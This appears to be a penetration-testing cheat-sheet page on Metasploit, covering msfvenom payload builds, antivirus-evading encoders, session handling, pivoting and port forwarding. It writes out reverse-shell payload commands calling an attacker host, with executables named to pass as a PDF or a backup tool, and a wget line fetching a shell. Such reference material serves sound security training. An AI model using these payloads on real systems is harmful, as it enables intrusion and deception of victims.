Metasploit

ABOUT

Metasploit Project is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute the exploit code. This exploit code can be custom-made by the user or taken from a database containing the latest already discovered and modularized exploits. The Metasploit Framework includes a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. At its core, the Metasploit Project is a collection of commonly used tools that provide a complete environment for penetration testing and exploit development. Files usually located at /usr/share/metasploit-framework.

  • What is MS Module? A module is a piece of software that the Metasploit Framework uses to perform a task, such as exploiting or scanning a target. A module can be an exploit module, auxiliary module, or post-exploitation module.

ARCHITECTURE

  1. Auxiliary - Any supporting module, such as scanners, crawlers and fuzzers.

  2. Encoders - Will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them.

  3. Evasion - While encoders will encode the payload, they should not be considered a direct attempt to evade antivirus software. On the other hand, “evasion” modules will try that, with more or less success.

  4. Exploits - Exploits, neatly organized by target system.

  5. NOPs - (No Operation code) Keep the payload sizes consistent across exploit attempts.

  6. Payloads - Payloads are codes that will run on the target system.

  7. Post - Post modules would be useful in post-exploitation.

MSFVENOM

Msfvenom is a tool that is part of the Metasploit framework and it is a command line tool for generating different types of payloads for exploiting. In addition to providing a payload with flexible delivery options, MSFvenom also allows us to encrypt & encode payloads to bypass common anti-virus detection signatures.

List Payloads

msfvenom -l payloads

Building a Stageless Payload for Linux

msfvenom -p linux/x64/shell_reverse_tcp LHOST=13.13.13.13 LPORT=443 -f elf > createbackup.elf

Building a Stageless Payload for Windows

msfvenom -p windows/shell_reverse_tcp LHOST=13.13.13.13 LPORT=443 -f exe > BonusCompensationPlanpdf.exe

Staged vs Stageless Payloads

Staged payloads create a way for us to send over more components of our attack. So if more simply, the whole payload has few stages, first to get connection and others to load additional programs

Stageless payloads do not have a stage. So all payload and programs are loaded at first time.

METERPRETER

The Meterpreter payload is a specific type of multi-faceted payload that uses DLL injection to ensure the connection to the victim host is stable, hard to detect by simple checks, and persistent across reboots or system changes. Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques.

Encoder

  • Generating Payload - With Encoding

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai

  • List Encoders

msf6 exploit(windows/smb/goose) > show encoders

  • MSF - VirusTotal

msf-virustotal -k <API key> -f TeamViewerInstall.exe

Sessions

Listing Active Sessions

msf6 exploit(windows/smb/goose) > sessions

Interacting with a Session

msf6 exploit(windows/smb/goose) > sessions -i 1

Getting shell

msf6 exploit(windows/smb/goose) > shell

Background session

meterpreter > background
OR
Ctrl+Z
OR
meterpreter > bg

Killing session

msf6 exploit(windows/smb/goose) > sessions -k 1

Listing Running Jobs

msf6 exploit(multi/handler) > jobs -l

Run an Exploit as a Background Job

msf6 exploit(multi/handler) > exploit -j

MAKING PROXY

# Configuring 
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
msf6 auxiliary(server/socks_proxy) > run
# Confirming proxy is running
auxiliary(server/socks_proxy) > jobs

Jobs
====

  Id  Name                           Payload  Payload opts
  --  ----                           -------  ------------
  0   Auxiliary: server/socks_proxy

PIVOTING

Autoroute

Autoroute is used in penetration testing to enable network pivoting, allowing attackers to route traffic through a compromised host to access internal subnets that are not directly reachable. This facilitates reconnaissance, exploitation, and lateral movement within isolated or segmented networks.

msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET 13.13.13.0
msf6 post(multi/manage/autoroute) > run
meterpreter > run autoroute -s 13.13.13.0/23
meterpreter > run autoroute -p # list active routes

Local Port-Forwarding

meterpreter > portfwd add -l 1234 -p 4321 -r 13.13.13.13
# Forward all packets on 1234 port to 4321 port on 13.13.13.13 host

Remote Port-Forwarding

meterpreter > portfwd add -R -l 1234 -p 4321 -L 13.13.13.13
# Forward all packets from 4321 port on 13.13.13.13 to our local 1234 port

USEFUL MSFCONSOLE COMMANDS

Specific Search

msf6 > search type:exploit platform:windows cve:2021 rank:excellent microsoft

Get more info about module

info

Permanent Target Specification

msf6 exploit(windows/smb/amogus) > setg RHOSTS 13.13.13.13

Show and Set Target for exploit

msf6 exploit(windows/browser/goose) > show targets
...
msf6 exploit(windows/browser/goose) > set target 3

Searching for Specific Payload

msf6 exploit(windows/smb/goose) > grep meterpreter grep reverse_tcp show payloads

Use Local Exploit Suggester

msf6 > search local exploit suggester

Ping Sweep

run post/multi/gather/ping_sweep RHOSTS=13.13.13.0/23

LIFEHACKS

  • Use wget -o parameter when you want to install revshell file into machine like:

wget http://13.13.13.13:1337/shell.exe -o shell.exe
PreviousNmapNextBloodHound